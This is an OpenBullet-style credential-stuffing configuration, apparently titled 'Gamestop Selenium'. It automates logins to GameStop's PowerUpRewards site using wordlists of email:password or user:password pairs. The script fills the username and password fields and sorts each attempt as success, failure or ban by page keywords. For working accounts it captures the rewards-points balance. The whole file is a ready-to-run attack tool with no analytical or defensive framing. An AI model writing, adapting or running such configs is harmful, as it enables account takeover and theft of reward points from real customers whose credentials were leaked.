[SETTINGS]
{
  "Name": "Gamestop Selenium",
  "SuggestedBots": 5,
  "LastModified": "2018-08-25T15:18:39.9685482+00:00",
  "AdditionalInfo": "",
  "Author": "Legitness",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": true,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
BROWSERACTION Open "" 
BROWSERACTION ClearCookies "" 
#OPEN_PAGE NAVIGATE "https://login.gamestop.com/Account/Login?ReturnUrl=https://www.gamestop.com/PowerUpRewards/" 60 
#INPUT_EMAIL ELEMENTACTION XPath "//*[@id=\"username\"]" 
  SendKeys "<USER>" -> VAR "" 
#INPUT_PASSWORD ELEMENTACTION XPath "//*[@id=\"password\"]" 
  SendKeys "<PASS>" -> VAR "" 
#SUBMIT BROWSERACTION SendKeys "<ENTER>" 
#CHECK_KEYWORDS KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Ban OR 
    KEY "/PowerUpRewards/Activation" 
    KEY "Oops! Game Over" 
  KEYCHAIN Success OR 
    KEY ">My Account<" 
  KEYCHAIN Failure OR 
    KEY "html: errorMessage" 
#REWARDS_BALANCE PARSE "<SOURCE>" LR "\"customerPoints\":" "}" Recursive=FALSE -> CAP "Available Points" "" "" 
